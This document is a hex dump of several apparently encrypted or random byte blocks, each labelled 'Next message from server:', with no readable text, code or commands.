0x51 0xbe 0xeb 0xf0 0x91 0x02 0xef 0xc7 0x68 0x3f 0xbc 0xff 0xf9 0x73 0x39 0xcb
0x56 0x84 0x5b 0xe7 0x28 0x82 0x22 0xf2 0xc3 0x84 0xb8 0x2e 0x12 0xd5 0xd6 0xf6
0x71 0x91 0xac 0x44 0xc2 0xc9 0xab 0xe0 0x4a 0x26 0xe3 0x8b 0x9f 0x1f 0x2f 0x8f
0x45 0x63 0x86 0x9b 0x96 0xb6 0xa7 0xf0 0xcf 0x8a 0x72 0xe3 0x76 0x03 0xeb 0x1b
0x92 0x58 0xcd 0xeb 0xe4 0xa6 0xc6 0xa4 0xbc 0x46 0x26 0x04 0xa2 0x35 0x21 0x8d
0xa7 0xc3 0x06 0x8f 0x38 0x94 0x8b 0x31 0xd3 0xda 0x50 0xa1 0xbd 0xff 0x36 0xad
0x9b 0xf3 0xb5 0xef 0x12 0x8a 0x14 0xfa 0x0a 0xc7 0xf5 0xd9 0xd3 0x33 0xf1 0xa2
0x97 0x18 0x57 0x59 0x1f 0xb8 0xaa 0xcf 0x81 0x76 0x22 0xe8 0x79 0x74 0x0c 0xf2
0x9f 0xb7 0x8d 0x80 0x26 0xfd 0x3c 0xc5 0x94 0xd3 0x39 0x52 0x3d 0xcd 0x4f 0xfa
0xe3 0x11 0xea 0x14 0x7a 0xe2 0xf3 0x42 0xda 0xb0 0x1b 0xa6 0x5e 0xfd 0x45 0xd0
0x93 0x84 0xb0 0xe6 0xd3 0x56 0x4f 0xd8 0x73 0x7d 0x56 0x70 0xa2 0x36 0x91 0xea
0x0c 0xe5 0x43 0x5e 0x07 0x8f 0x30 0x15 0xbe 0x82 0x2e 0xcc 0x5c 0x55 0x62 0x84
0xd3 0x60 0xc8 0xd4 0xd7 0x45 0x2a 0x63 0x40 0x0a 0xaa 0x04 0xd4 0x3a 0xb2 0xb4
0xdc 0x3e 0x12 0xe2 0x81 0x72 0x1f 0xfd 0xde 0xae 0xb7 0xe2 0x10 0x2e 0xf7 0xf6
0xbe 0x7f 0xa3 0x0b 0xc9 0xa3 0x65 0x6e 0xa4 0x4e 0x56 0x3d 0x7c 0x7f 0xea 0x38
0xd1 0x3c 0x2c 0x2e 0xb1 0x21 0xfa 0xd7 0x58 0xb5 0x06 0xdb 0x2b 0xe1 0x6b 0xee
0xa4 0x9b 0x40 0x7e 0x98 0xe4 0x05 0xf2 0x4a 0x24 0x88 0xe6 0xfa 0x23 0x81 0x52
0xc0 0x34 0x68 0x3d 0x72 0xb6 0xa2 0xba 0x49 0x70 0x4e 0x5d 0xcb 0x02 0x86 0x96
0x16 0x04 0x9e 0xb1 0xb6 0x3b 0x12 0x49 0x25 0x83 0x57 0xb6 0x2a 0xc6 0xff 0x07
0xac 0x38 0x58 0x25 0x57 0x19 0x79 0x6c 0x16 0x8a 0x10 0x63 0x42 0x55 0x09 0xcb
0x26 0x6e 0xb7 0x34 0x67 0xef 0x1d 0xff 0x7a 0x7b 0xaa 0x98 0x4a 0xf0 0x50 0x2b
0xe2 0x90 0x7e 0x92 0x83 0x24 0x9a 0x33 0x3f 0x6c 0x80 0x49 0x9c 0x82 0x8c 0x86
0xc3 0x1d 0xc7 0xbc 0x0c 0xee 0x9c 0x3e 0x49 0x9b 0xa3 0xfc 0x62 0x4b 0xd0 0x81
0xd2 0x5e 0x14 0x58 0x8e 0xbd 0x22 0xa3 0x02 0xfc 0x7f 0x48 0xa3 0x34 0xf0 0xbf
0x4b 0x52 0xb9 0x46 0x60 0x8b 0xda 0x1b 0xf8 0xc8 0x3d 0x28 0x9e 0xc6 0xe6 0x97
0x9d 0x78 0x0c 0x86 0x83 0x65 0x33 0xa5 0x51 0x0b 0xdc 0x60 0x27 0x2f 0x3f 0x37
0x1d 0xf5 0x32 0x33 0x76 0xd6 0xa6 0x97 0x0a 0xfc 0x9c 0x29 0xe1 0x67 0xb6 0x3c
0x74 0x57 0x01 0xc1 0xe9 0x69 0x9c 0x79 0xe5 0x75 0xdd 0x7a 0x2b 0x53 0xea 0x87
0x6a 0x94 0x1d 0x8a 0x0c 0x49 0x9a 0x15 0x1f 0x37 0x63 0x1f 0x98 0xc1 0x1c 0x5e
0x90 0x0c 0xae 0xee 0xb7 0x65 0xd3 0x1b 0xf2 0xf5 0x33 0x46 0x2e 0xaf 0x89 0x35
0x01 0x3a 0x8d 0x33 0x6e 0x39 0xd1 0xe7 0xf7 0xec 0x53 0xb9 0xb5 0xfd 0x46 0xbe
0xc7 0xe2 0xec 0x4e 0x7c 0xe3 0xd1 0x7d 0xe4 0xbd 0x8b 0x1e 0x0d 0x9f 0x7b 0xcd
0x5a 0x47 0x0f 0x0a 0x73 0x8c 0x7a 0x2f 0x5e 0xa4 0xf7 0xf7 0x5a 0x96 0x4d 0x7d

Next message from server:

0x0e 0x25 0x18 0x58 0xf5 0x3e 0x6d 0x52 0x52 0x22 0xd5 0x42 0xe3 0xd6 0x85 0x3e
0x88 0x81 0x71 0x1a 0xcd 0xa5 0xea 0x0b 0xd9 0x7f 0x70 0x9b 0x0b 0x18 0xb8 0x3e
0x74 0x6c 0x78 0x3b 0x8d 0xbf 0x60 0xaf 0xa9 0x26 0xd0 0x3b 0xcf 0xe8 0x3c 0x7f
0x5c 0xd5 0xcf 0x15 0x48 0xc4 0x9c 0x5d 0xb9 0xe6 0x12 0x4a 0x3d 0xe0 0x14 0x10
0x9e 0x2f 0xcb 0x57 0xf9 0x39 0xb0 0x1e 0x06 0x5b 0x93 0x0c 0x5e 0x24 0xeb 0xab
0x80 0x5d 0x9b 0xe0 0x06 0xc4 0x82 0x5d 0xe3 0xdb 0xdd 0xc2 0x04 0x8a 0x33 0x78
0x8d 0xdd 0xa8 0xd5 0x2f 0xc7 0xbb 0xc3 0xac 0x2b 0x9c 0x1a 0xc0 0x73 0x97 0x7c
0xe4 0x41 0x39 0x72 0xeb 0xa9 0xb4 0x11 0xbd 0xa8 0xc1 0xc2 0xb9 0x73 0x0a 0x56
0x37 0x01 0x79 0x3d 0xc1 0x87 0x3d 0xdf 0x76 0x7e 0xfe 0xd0 0x88 0xc0 0x59 0xe2
0x0e 0x3a 0xda 0xeb 0xed 0xd7 0x38 0x59 0x91 0xe2 0xea 0xe4 0xa2 0x5c 0xc7 0xc2
0x3f 0x68 0x1f 0x61 0xdd 0xcc 0x11 0x58 0x58 0x56 0x03 0xc3 0xab 0x1c 0xad 0xf6
0x65 0xfc 0x66 0x8d 0x3d 0xc5 0x2f 0x28 0x9a 0xab 0xba 0x70 0x6c 0xdc 0x08 0x38
0xac 0x79 0x80 0x42 0x17 0x13 0xa5 0x0b 0x7e 0xb8 0xe3 0x9e 0x5d 0xe0 0x3b 0x27
0x40 0xdf 0x0a 0x52 0x5d 0x18 0x2b 0x13 0x93 0x01 0x18 0xa0 0xfc 0xde 0x24 0x62
0xb8 0x89 0xf9 0xc3 0xe0 0x94 0xf9 0x8a 0x1d 0x55 0x58 0x62 0xb5 0x92 0xbe 0x60
0xcc 0xfd 0x1b 0x19 0xf3 0x3f 0xc3 0x21 0x16 0xce 0xbc 0x1e 0xfb 0x33 0xea 0xa8
0xf9 0xc5 0xdb 0x01 0xf1 0x55 0xac 0x3f 0xbd 0x78 0x2d 0x1d 0xae 0xbd 0x4b 0x12
0xf6 0xaa 0x00 0x58 0xb7 0x96 0x37 0xb0 0x93 0x4f 0xef 0x07 0xd6 0x02 0x4d 0x65
0xe6 0xa1 0xf5 0x20 0x0a 0xa1 0xaa 0xe7 0x93 0x09 0x31 0xd2 0xba 0xdb 0xab 0x32
0x2c 0x14 0xc1 0x8d 0x64 0xe3 0x05 0x0b 0x23 0x77 0x55 0x28 0x4c 0xe0 0xb8 0x8e
0xbc 0xa1 0x1f 0xec 0xdf 0x13 0xe5 0x44 0xb7 0x5d 0xb2 0xce 0xed 0xef 0x83 0xdb
0x95 0x62 0x8d 0x03 0x95 0x29 0x56 0xf7 0xaa 0x5a 0xdb 0x7b 0x99 0x54 0x77 0xe1
0x8a 0x85 0x98 0x65 0x03 0x24 0xcf 0xda 0x65 0xb1 0xd9 0xdd 0xe2 0xd3 0x9a 0x3b
0xd1 0xef 0x8b 0x12 0x8c 0x77 0xc0 0x2f 0x5f 0x15 0xc6 0x62 0x62 0xe0 0x0d 0x6d
0xd6 0x12 0x42 0x01 0x87 0x35 0x43 0x06 0x6e 0x45 0xcd 0xe7 0xfe 0x69 0xab 0x5a
0x97 0x99 0xe9 0xef 0xb3 0x52 0x3f 0xa9 0x01 0x88 0xd7 0xa5 0x1b 0x85 0x79 0xc6
0x18 0xfa 0x59 0x65 0x57 0xb7 0xfb 0x97 0x5d 0xde 0x5c 0x6d 0x5e 0x9b 0xa9 0xce
0xa5 0x92 0x79 0x6f 0x17 0x11 0x9d 0x0b 0x16 0x27 0xe4 0xc3 0x4d 0xc2 0xf1 0xbc
0x61 0x96 0x22 0xdf 0x90 0x2d 0x69 0x4e 0xb2 0x29 0x3f 0x8e 0x70 0xf5 0x50 0xa4
0xeb 0x0e 0xf3 0xce 0x32 0x26 0x44 0x6d 0xd9 0xa5 0x14 0xce 0x80 0x83 0xe5 0x4d
0x99 0x7a 0x27 0x8c 0xe8 0x72 0x0d 0xd4 0x24 0xaa 0x97 0x07 0x98 0x2b 0x0d 0x7a
0xbd 0x59 0xb7 0xed 0xe5 0x6d 0x18 0xc8 0x08 0x09 0x32 0xfa 0xe8 0x99 0xd8 0xa1
0xde 0x45 0x04 0x01 0xc8 0x04 0x88 0xbe 0x09 0x09 0xbc 0xc7 0x10 0x02 0x1c 0x02
0x2a 0x99 0x68 0x4e 0x40 0x3a 0xe1 0xbd 

Next message from server:

0xd7 0x8b 0xe0 0xaa 0x46 0x08 0xda 0x7d 0x6e 0x08 0x82 0xbc 0x7e 0xad 0x45 0x86
0xf8 0x79 0x95 0xd9 0x73 0x90 0xb5 0xc9 0xe7 0x7b 0xe5 0x27 0xf2 0x2d 0xbf 0x86
0x2e 0xb9 0x0b 0x15 0x78 0x57 0x24 0xad 0x15 0x3b 0xfd 0xa6 0xfb 0x78 0x47 0x60
0x65 0xe2 0x4b 0x98 0x11 0xa5 0xb7 0x93 0xbe 0xc8 0x28 0x24 0xd6 0xb7 0x4d 0x80
0x79 0x7e 0x05 0xca 0xca 0x43 0x5c 0xbc 0x23 0x97 0x50 0xb1 0xef 0x69 0x65 0x05
0x0f 0x59 0x95 0x19 0x37 0x2c 0xcf 0xae 0xff 0x49 0xaa 0x8b 0xb2 0xe8 0xdc 0x91
0x89 0xf0 0x94 0x3a 0xa7 0x9b 0x56 0xa0 0x90 0xcc 0xcc 0xbf 0x0b 0xa7 0x7a 0x65
0x63 0x9e 0x96 0x37 0x71 0x70 0x43 0xd5 0x2d 0xe7 0x46 0x5e 0x75 0xf5 0x68 0x9e
0x0a 0xa6 0xbb 0xf8 0x26 0xee 0x84 0x74 0x67 0xa7 0x0b 0xe1 0xa6 0x04 0x8b 0x65
0x96 0x9d 0x60 0xc5 0xfc 0x74 0xc9 0xde 0xe2 0xdd 0xfe 0xb1 0xed 0x1c 0x7c 0x2a
0x78 0xaf 0x9b 0x6f 0x3c 0xc0 0x6c 0x77 0x15 0x16 0xfc 0x00 0xd1 0xe2 0x49 0x65
0x6a 0x2a 0x74 0xb6 0xa9 0x00 0x2d 0x7f 0xb4 0x88 0x70 0xba 0x8c 0x81 0xcd 0x97
0xc6 0x06 0x44 0x0a 0xd5 0x99 0xea 0x49 0x81 0xcd 0xd1 0x44 0x6a 0xf8 0x54 0xa8
0x45 0x84 0x84 0x24 0xa7 0x4f 0xc4 0x23 0x0d 0x3b 0x53 0x3e 0xfa 0x74 0x2b 0xea
0x82 0xc9 0x71 0x1c 0xcb 0x5a 0x2b 0x3a 0x22 0x33 0x18 0xce 0x4e 0xa1 0x13 0x0e
0xf8 0x1b 0x94 0x20 0x2b 0xc2 0x3d 0xdd 0xa4 0x88 0xc5 0x69 0x3b 0x37 0x21 0x62
0x2d 0x09 0x02 0xd9 0xeb 0x8e 0x3c 0x46 0x5a 0x18 0x0a 0xe7 0x03 0xc6 0x10 0xb1
0x32 0x34 0x7f 0xf2 0xe3 0xf5 0x66 0xa3 0x79 0x75 0x1c 0xae 0xf6 0x0f 0xaf 0xd2
0xef 0xe0 0xb1 0xe8 0x91 0x9e 0xdb 0x23 0x57 0x0a 0x71 0xcd 0x5f 0x64 0x3d 0xba
0x59 0x7a 0x50 0x78 0xf1 0x23 0x1e 0x51 0x15 0x4c 0x1b 0x0c 0x83 0x4a 0x0e 0x74
0x07 0x8d 0x26 0x45 0x05 0x3c 0x00 0x38 0xb5 0xff 0xbf 0x47 0xd1 0x3a 0x68 0xa1
0x6e 0x40 0xc7 0xa2 0x36 0xd4 0x42 0xcf 0x4d 0x60 0xc8 0x47 0x26 0x63 0x3a 0x9d
0x57 0x4b 0xae 0xcf 0xe8 0xc9 0x39 0x79 0x50 0x8c 0x22 0x0d 0x06 0x31 0xcb 0x3f
0x2d 0xe4 0xbe 0x7d 0x9a 0x2d 0xc6 0x45 0x75 0x8c 0x4f 0xb7 0xcd 0x10 0x3d 0x41
0x93 0x1e 0x4e 0x2e 0xc1 0xb1 0x9d 0x20 0x3d 0x1a 0x10 0x83 0xd2 0x77 0xbf 0x93
0xf9 0x31 0xb0 0x94 0x0e 0xfe 0x11 0xf4 0x9d 0xb4 0x0d 0x4d 0x23 0x37 0xca 0xef
0x5e 0xa9 0x48 0xab 0x9f 0x38 0xb7 0x42 0x10 0xeb 0xba 0xb3 0xa1 0x99 0x8c 0x2a
0xb8 0x6a 0xac 0xe1 0x4b 0x0a 0xdf 0x11 0xd0 0x97 0x99 0xe3 0x6b 0x96 0xff 0xec
0x21 0x6f 0x14 0x36 0x1e 0x57 0xc2 0x81 0xcc 0x49 0xdc 0x7f 0xe7 0xc0 0x91 0xab
0x2c 0x16 0x98 0x93 0xb2 0xb6 0x61 0xc1 0xb5 0x8f 0x14 0x1a 0x6f 0xc6 0x14 0x34
0x8f 0xdb 0x97 0x8f 0x75 0x00 0x05 0xb8 0x77 0x17 0xd0 0x06 0x9b 0xff 0x79 0xf9
0xcb 0x4e 0x5d 0x85 0xd7 0xeb 0x68 0xaf 0x53 0x4f 0x0c 0xd9 0x36 0x96 0x23 0x52
0x41 0xbf 0xc0 0xeb 0x44 0x7c 0x3e 0x78 0x56 0x3b 0x3f 0x8a 0xb1 0x58 0x33 0xf9
0x55 0xdd 0x60 0x1d 0x7b 0x5e 0x46 0x61 0x3d 0x7e 0x4d 0xa0 0xea 0xfc 0x56 0x23
0x61 0xbf 0xc5 0x1f 0x79 0x07 0x3c 0x7d 0xf4 0x9c 0xb1 0xd1 0xaf 0x5a 0x48 0x2c
0xb5 0x1d 0x81 0xcc 0xce 0x2c 0x50 0xa9 0x0e 0x8a 0x9f 0xb4 0xc4 0xb6 0xaf 0x0f
0xce 0x5d 0xb2 0xcc 0xae 0x9b 0x0d 0xbe 0x98 0x2d 0xa1 0x47 0xef 0xce 0x62 0xcd
0x62 0x79 0x3c 0x0f 0xa7 0x05 0xc8 0xcb 0x21 0xf2 0xa9 0x85 0x79 0xae 0x30 0xcb
0x10 0x98 0x65 0xdf 0xe0 0x95 0xe8 0x1a 0x35 0x85 0xb6 0xdc 0x80 0x5f 0x92 0x04
0xa8 0xb8 0xcc 0x13 0x5f 0x5c 0x79 0x8f 0xba 0x56 0x56 0x4e 0x35 0x1f 0xe4 0x63
0x65 0x67 0xaf 0xdb 0xdd 0x42 0x17 0xd5 0x11 0x92 0x23 0x4e 0xea 0x2a 0x43 0x55
0xde 0x22 0x07 0xeb 0x62 0xb9 0x9f 0x83 0x4a 0xaa 0xec 0xc2 0x97 0x52 0xb3 0xf7
0xa7 0x44 0xf6 0x31 0x10 0x23 0xc5 0x56 0xcc 0xbb 0x23 0xa9 0xaa 0x53 0x18 0xff
0x66 0x5e 0x87 0x8f 0xb1 0x6c 0x2e 0xf3 0xcd 0xf2 0xbb 0x0d 0xbc 0x13 0x9a 0xe3
0x3e 0xd2 0x22 0x3f 0x65 0x1c 0x53 0xd6 0x64 0x38 0x5f 0xd8 0x03 0x09 0x19 0x19
0xaf 0x64 0x16 0xc3 0xac 0x35 0x4b 0x99 0xf1 0xd3 0xb9 0xbd 0x09 0xe5 0x60 0x86
0x02 0x8c 0x00 0x99 0x58 0x7b 0x3e 0x69 0x4d 0xc6 0xcd 0x49 0x72 0x65 0xba 0xbb
0xd1 0xb4 0x3a 0x92 0x88 0x5e 0x34 0xea 0xa6 0xd5 0xfb 0xff 0x8f 0x29 0xbf 0x71
0xca 0x5b 0x1c 0xb5 0x06 0x28 0x8a 0x13 0x15 0x9d 0xf1 0xa4 0xb9 0x77 0xb9 0x2d
0xc8 0x37 0x3d 0xb4 0xa9 0x66 0x54 0x7a 0x32 0x21 0xb1 0x6e 0x19 0xb0 0x4e 0xd0
0x57 0x91 0x89 0x68 0x9c 0xb5 0xc3 0x8b 0xc6 0xa8 0xb2 0xc1 0x12 0xf7 0x81 0x78
0x09 0xdd 0x30 0xf2 0x3b 0x4a 0xcd 0xad 0xe2 0x0d 0x02 0x4b 0xf4 0x27 0x71 0xd5
0x06 0x1a 0xc1 0x8f 0x53 0x4f 0xf6 0xf2 0x3e 0xfe 0xb3 0x76 0x94 0x7d 0xea 0x71
0x6a 0x8f 0xb2 0xf6 0x48 0x6a 0xf5 0x18 0x27 0x62 0xa1 0xed 0xc4 0x33 0x82 0x11
0x9d 0x5c 0x68 0xb1 0x7a 0x03 0x9b 0x82 0x68 0xb3 0xda 0x51 0xe3 0x77 0x86 0x90
0xaf 0x11 0x70 0xae 0xba 0x42 0xb6 0x10 0x1a 0xd0 0xca 0x85 0x1e 0xee 0x1a 0x4b
0x0e 0x17 0x2e 0xd9 0x09 0x94 0x1c 0x1e 0x69 0x94 0xe5 0x35 0xdc 0xc6 0xd6 0xcf
0x6f 0xa4 0x37 0x26 0xd7 0xcb 0x3a 0xbc 0xe0 0x9a 0xe4 0x72 0x15 0x16 0xe9 0xf0
0x48 0x14 0xf9 0xa7 0xbf 0xc5 0x51 0xc0 0xf6 0x94 0xfa 0x49 0xef 0x28 0x96 0xd7
0xb3 0x23 0xb6 0xa9 0x35 0xe0 0xc4 0x2b 0xab 0x8c 0x13 0x3d 0x56 0x0a 0xa1 0xdb
0xb6 0x50 0x13 0xf1 0x09 0x21 0x1b 0x4d 0xbe 0x0c 0xb4 0x67 0x81 0x6e 0x2b 0x93
0x65 0x0f 0x90 0xf5 0x77 0xdc 0xf8 0x41 0x1c 0xe4 0x56 0xec 0xa9 0x17 0x77 0xb5
0x7e 0xeb 0x88 0x6f 0xc2 0x4d 0x5f 0xd1 0x54 0xee 0x9b 0x1a 0x35 0xd3 0x5e 0x84
0x47 0x51 0xa7 0x9f 0xe2 0xbc 0xd6 0x46 0x80 0xfe 0xfe 0xf7 0xd6 0xd6 0x93 0x8b
0xa7 0x16 0x35 0x27 0xea 0x24 0x22 0x5f 0x34 0xad 0xf3 0x85 0xbb 0xc0 0x34 0xae
0x2d 0x20 0x3d 0xe7 0xb2 0x5d 0x8a 0xa8 0xc2 0x05 0x80 0x05 0x09 0x3e 0x52 0x63
0x58 0xdd 0x7e 0x18 0x89 0xad 0x01 0x9a 0x19 0xb7 0x55 0x9f 0x0d 0x3a 0xcf 0xbc
0x6b 0xc4 0x6a 0xeb 0x3d 0x1e 0xe3 0x72 0x4a 0x5e 0xe1 0x2e 0xa2 0x7f 0x39 0x72
0xdb 0x06 0x7d 0x46 0xe8 0x21 0x2f 0xaf 0x07 0x23 0x96 0xf7 0x3c 0x92 0x54 0xa4
0xce 0xad 0xe2 0x11 0x7f 0x5c 0x22 0xce 0x1c 0x5b 0x72 0x1a 0x36 0x1d 0xb7 0x58
0x62 0x48 0x3f 0xba 0x2c 0xa7 0xf8 0x07 0x6b 0x32 0x0b 0xf6 0xe2 0x9d 0x2f 0x4f
0x6f 0xdb 0x83 0xf4 0x94 0x0d 0x52 0x25 0xb9 0x6b 0x8b 0x97 0xaa 0x9e 0x9d 0x6a
0xdc 0x1a 0xfa 0x3c 0x01 0x18 0x79 0xb7 0x32 0xda 0x2b 0xae 0xe7 0xfd 0x02 0xa3
0xac 0x0a 0x05 0x62 0x04 0x91 0xc7 0xc8 0x48 0x99 0x8c 0x76 0xe0 0x1a 0x32 0xb7
0xf4 0x6f 0x46 0xc0 0xe7 0x35 0x63 0xa7 0x7a 0x6a 0x3a 0x7c 

Next message from server:

0x86 0x84 0xc4 0x9e 0x31 0x8a 0xac 0x17 0x2c 0xb6 0x96 0x21 0x4b 0xf9 0x5c 0x29
0xb7 0x05 0xcf 0xc4 0xb6 0x20 0x3e 0xc8 0x8c 0x28 0x66 0x3b 0xa8 0xa6 0xb5 0xf8
0xde 0xd8 0x8d 0x13 0x66 0x39 0x54 0x81 0x49 0xe9 0x0f 0xf6 0x75 0x1d 0x00 0x6c
0xf8 0x27 0xa6 0x24 0xbd 0xa4 0x23 0x5e 0x05 0x54 0x4f 0x9b 0xe1 0x26 0xe2 0xf8
0xb1 0x69 0x49 0xa9 0xd5 0xcc 0x06 0xe8 0xdc 0xf7 0x67 0x77 0xc2 0xae 0x8e 0xdf
0x24 0xc6 0xc8 0x10 0xbb 0x89 0x18 0x8f 0xef 0xef 0x08 0x9b 0x20 0xba 0x90 0xc2
0x8e 0xa8 0xd5 0x74 0x3b 0x12 0x27 0xdf 0x50 0x9f 0xd4 0xdb 0xe2 0x8f 0x8d 0x96
0x70 0xd5 0x43 0x01 0xb8 0x81 0x50 0x74 0x9e 0x41 0x56 0xd1 0x2f 0xcb 0xbd 0xd9
0xe4 0x18 0x02 0x35 0x5e 0x48 0x54 0xd7 0x5e 0x14 0x56 0x8b 0x6c 0x21 0xd1 0xbf
0x09 0x02 0x61 0x72 0x77 0xdc 0xc5 0x1d 0x36 0xb9 0x61 0x67 0x19 0xf4 0x71 0x68
0xd4 0xa3 0xf0 0x02 0x7c 0x5c 0xed 0x9c 0xc9 0x3b 0xac 0x94 0x56 0x1d 0x82 0x44
0xae 0x9a 0x5c 0xa9 0xc5 0x43 0x3e 0xe1 0xc3 0xee 0x0e 0x58 0xcb 0xd3 0x2c 0x18
0x35 0xe4 0x2e 0xcc 0x44 0x38 0xf3 0x0f 0x65 0x0b 0x72 0x16 0x1b 0x40 0xb3 0xb5
0x39 0x50 0xc9 0x36 0xe3 0x46 0xe2 0xf9 0x2f 0x55 0x26 0x07 0xd2 0xfd 0x97 0x45
0x81 0xa0 0x7e 0x4d 0x87 0x7f 0xa3 0xb7 0xcc 0x76 0xe5 0x6f 0x5a 0x5c 0xa1 0x9e
0x11 0x4a 0x55 0xa7 0xce 0xd4 0x31 0xfa 0x90 0xf3 0x6b 0x25 0xef 0xfe 0x17 0x4f
0x2f 0x8b 0xde 0x73 0xde 0x77 0xd7 0x38 0x5e 0x9f 0x45 0x7a 0xd3 0xb4 0xc5 0x11
0xe9 0x8b 0x1a 0x84 0x5d 0x0e 0x41 0x01 0x21 0x6f 0x29 0xc4 0x2e 0x1f 0x0f 0x30
0x15 0x51 0xee 0xad 0x67 0xc3 0x5f 0xe2 0x2d 0xa8 0x78 0xff 0xbc 0xfa 0x02 0x14
0x16 0xd5 0xe1 0xc4 0xb7 0x8b 0x83 0x3d 0xa1 0x6d 0xbc 0x5e 0xa6 0xd4 0x73 0xd0
0x8c 0x19 0x30 0x4c 0x5f 0x14 0x81 0x69 0x59 0x3b 0x6c 0x7f 0x05 0xed 0x11 0x95
0x10 0x98 0x0c 0xc8 0xa8 0x03 0x4a 0x5d 0xc0 0xc4 0x9d 0xbb 0x44 0x2f 0x4d 0xd0
0xf0 0xa7 0x30 0x32 0x8d 0x75 0xad 0xb0 0xcc 0x12 0xcf 0x85 0xde 0x7c 0x3d 0xe8
0x85 0x1c 0xc4 0x45 0xd9 0xa4 0x57 0x23 0x34 0x75 0xf5 0xa8 0x2b 0xc7 0x02 0xfe
0x45 0xee 0xd8 0x6f 0x57 0x64 0x19 0xb2 0x51 0x0e 0x6c 0x88 0xd0 0xb7 0x6c 0x66
0x02 0x47 0x98 0x34 0xa2 0xd4 0x68 0x83 0x3f 0x8c 0x7a 0x03 0xa4 0x1c 0x59 0x17
0xb3 0xcd 0x2c 0x18 0xdf 0xf7 0x6a 0x8c 0xe0 0xb7 0x6c 0xb1 0x1f 0x3e 0x04 0x69
0x18 0x4a 0x64 0x70 0x57 0x78 0xda 0xcb 0xf9 0x98 0xee 0xa0 0x93 0xc8 0xe7 0x9d
0x14 0xb2 0x47 0xd8 0x32 0xa7 0xa2 0xaf 0x12 0xb8 0xe8 0xe7 0x76 0xb0 0xcb 0xcd
0x26 0x80 0x37 0xa2 0xd4 0x69 0x3b 0xc0 0x5c 0x8e 0xa0 0x2c 0xba 0x97 0x4e 0xba
0xc7 0x64 0x05 0x66 0x28 0x9f 0xb2 0x3c 0x4c 0x3a 0xc9 0x27 0x8c 0x5e 0x14 0x9d
0xbc 0x5e 0x2f 0x66 0x42 0xd2 0x6e 0x54 0x52 0xd9 0xa9 0x0c 0x94 0xf2 0x61 0xcf
0x0c 0xa4 0x4e 0x7d 0x83 0x64 0x20 0x1d 0xf1 0xcb 0xab 0x49 0x17 0x92 0x1e 0x49
0x88 0x52 0x59 0x29 0x02 0x04 0xa2 0x4e 

Next message from server:

0xf2 0xee 0x5e 0x17 0x82 0x91 0x8f 0x05 0x0a 0x47 0x66 0x3b 0x24 0x06 0xd8 0x27
0x52 0xfc 0x77 0xe5 0xc7 0x13 0x39 0x8b 0xb5 0xf7 0x64 0xf0 0xba 0x0f 0xd2 0x92
0x54 0x9e 0xbe 0x3b 0x71 0xef 0x74 0x28 0x94 0x36 0x1b 0xcf 0x31 0xfa 0x04 0xa9
0xb4 0xfc 0x5e 0x65 0x21 0x5a 0xad 0x5f 0xc2 0xe7 0xe0 0xf6 0x64 0x39 0x65 0x43
0x0b 0x61 0x0b 0xcd 0x05 0x73 0xe7 0xda 0xaa 0xec 0x5c 0x8f 0xa4 0x14 0x10 0x79
0x12 0x78 0xe4 0xa8 0x4e 0x03 0x5e 0x9c 0x40 0xe9 0xe2 0x44 0x0e 0x3e 0x53 0xf3
0x2c 0x65 0x14 0xad 0xd7 0xbf 0xc7 0x4c 0xa8 0x18 0xfa 0x6e 0x4c 0x3e 0x2d 0x7f
0x3e 0xfc 0x5f 0x82 0xc3 0x99 0x3a 0xa6 0x28 0x76 0x54 0x74 0x55 0xe0 0xd4 0x6d
0x30 0x5a 0x65 0x5b 0x2a 0x7b 0x65 0x78 0xc4 0xb9 0xfd 0x57 0xc4 0x8d 0xb3 0xf5
0x00 0x27 0x3e 0x45 0x95 0xb4 0x42 0xd7 0x96 0x87 0xa0 0x0c 0x9e 0x29 0xd6 0x59
0xba 0xc2 0xf5 0x27 0xc8 0x4d 0x71 0xd8 0xb7 0xca 0x15 0x8e 0x9a 0xcd 0x51 0x42
0xb8 0x9a 0x98 0xa0 0x79 0xb4 0x44 0x3b 0x53 0xab 0x0e 0x43 0x99 0xbc 0x7a 0xf1
0x09 0x99 0xc9 0x9b 0x5a 0x23 0x66 0x48 0xcd 0x6e 0x77 0x30 0x84 0x31 0xdb 0x69
0xa8 0x6a 0x18 0x1d 0x44 0x64 0x7d 0x18 0xa2 0xae 0x3a 0x76 0x8d 0xe9 0xc6 0x2e
0xfd 0xcf 0xc3 0x8c 0x2d 0x84 0x65 0x32 0xfd 0x07 0xb7 0x73 0x46 0x64 0xb7 0x98
0x89 0xde 0xb5 0x60 0x9a 0x61 0xe7 0x5a 0xd6 0x76 0x29 0xdc 0x6c 0xd2 0xf0 0x14
0xae 0x30 0x9d 0xcb 0x53 0xd4 0xb5 0x2c 0x80 0x40 0x75 0x1a 0x8e 0xd9 0x04 0x08
0x3d 0xe3 0xc9 0xbb 0x97 0xc6 0xac 0x70 0x99 0x91 0xa7 0xfd 0x1e 0xe6 0x41 0x04
0xdf 0x04 0xd2 0x8a 0x59 0xed 0x53 0x11 0x4c 0xbe 0xfa 0x0c 0x4d 0x5c 0x00 0xbd
0x97 0xb4 0x4d 0x6b 0xb2 0x23 0x59 0xff 0x9f 0xea 0x0e 0x9c 0x24 0x47 0x33 0x8d
0xd8 0x3e 0x66 0xaa 0x14 0xed 0xac 0x5a 0xd7 0xdd 0x23 0x17 0x7b 0x07 0x9e 0x88
0xaa 0xcb 0x38 0x7c 0xa6 0xa7 0x47 0x7c 0x7f 0xfa 0xd7 0xa1 0xed 0xb3 0x6d 0x01
0xfa 0xe5 0xaa 0x1b 0x2e 0xc6 0xcd 0x41 0x2f 0x90 0xce 0xc2 0xcd 0xa1 0xce 0x92
0x42 0x7b 0x9f 0x54 0x5f 0x01 0x0b 0xaf 0x39 0x31 0x67 0x65 0x45 0x59 0xa1 0x3e
0xa6 0xac 0x90 0xe1 0x2b 0x1b 0x7c 0x8c 0x3f 0x0b 0xda 0x0e 0x57 0xb7 0x17 0x45
0xba 0xd6 0x72 0x6b 0xbd 0x3e 0x0c 0xa7 0xa3 0xd3 0xb0 0xf4 0x9a 0xe3 0x89 0xbb
0x92 0xa5 0xb9 0x1f 0x42 0xd4 0x89 0xd3 0xba 0x23 0x84 0x81 0x58 0x98 0x4e 0x0a
0xed 0x14 0xcf 0x7a 0x42 0xa8 0xaa 0x0f 0xc0 0x16 0xa3 0x97 0x1b 0x8b 0xf4 0x50
0x83 0x35 0x8a 0xf9 0xaf 0x2e 0xb9 0xe3 0x69 0x72 0x3e 0xb1 0x54 0x1c 0xf3 0x6f
0xcc 0x1c 0xb9 0x34 0x06 0xf3 0xd3 0x67 0x78 0xd3 0xfb 0xdf 0x27 0xe9 0x4f 0xa9
